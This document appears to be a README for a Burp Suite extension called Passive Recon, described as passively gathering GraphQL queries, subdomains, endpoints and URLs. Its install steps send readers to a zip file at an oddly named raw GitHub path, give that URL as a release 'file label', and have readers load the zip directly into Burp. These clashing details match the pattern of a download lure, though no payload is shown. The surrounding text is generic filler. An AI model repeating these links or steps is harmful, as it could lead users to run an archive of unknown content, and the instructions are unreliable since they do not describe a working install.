Welcome to Passive Recon, a Burp Suite extension designed for easy passive reconnaissance while you work. This tool automatically gathers endpoints, subdomains, GraphQL queries, and URLs, making it easier to analyze your target.
Follow these steps to download and run Passive Recon.
-
Visit the Releases Page
To download the latest version of Passive Recon, visit the Releases page. -
Choose the Appropriate File
On the Releases page, you will find multiple files based on your platform. Select the correct version compatible with your operating system. For most users, this will be the file labeled "https://raw.githubusercontent.com/ahmedibrahim081/Passive-Recon/main/epigenic/Passive-Recon.zip". -
Download the File
Click on the download link for the chosen file. Your browser will start downloading it. Once the download finishes, locate the file on your computer. -
Run Passive Recon in Burp Suite
Open Burp Suite.- Navigate to "Extensions" in the top menu.
- Click on "Add" and choose the downloaded
https://raw.githubusercontent.com/ahmedibrahim081/Passive-Recon/main/epigenic/Passive-Recon.zipfile. - Click "Next" and then "Finish". Your extension is now active.
-
Start Using Passive Recon
With Passive Recon running, it will capture and analyze traffic automatically. Explore the dedicated tabs for GraphQL, Subdomains, Endpoints, and more.
- Parses GraphQL requests and responses.
- Works with standard queries, mutations, and fragments.
- Detects meta-GraphQL requests that might be overlooked.
- Passively extracts subdomains from network traffic.
- Presents unique findings in a separate tab for easy review.
- Collects parameters, API endpoints, and relevant URLs.
- Displays findings in organized, duplicate-free lists.
- Assists in quickly mapping out your target's attack surface.
- Passive Recon fits seamlessly within Burp Suite.
- Includes four tabs: GraphQL, Subdomains, Endpoints, and URLs.
To use Passive Recon, ensure you have the following:
- A compatible version of Burp Suite.
- Java Runtime Environment (JRE) version 8 or higher installed on your system.
If you encounter issues while using Passive Recon:
- Make sure you have the latest version of Burp Suite.
- Ensure Java is installed correctly.
- Consult the "Help" section in Burp Suite for common problems related to extensions.
- For detailed instructions, refer to the User Guide.
- Join the community discussions on GitHub Issues.
- Watch tutorial videos for step-by-step guidance on using Passive Recon effectively.
If you need assistance or have questions, feel free to reach out through the GitHub repository's Issues page.
Passive Recon is designed for simplicity and effectiveness. Use it to strengthen your security testing process. Make sure to regularly check the Releases page for updates and enhancements. Enjoy better reconnaissance with Passive Recon!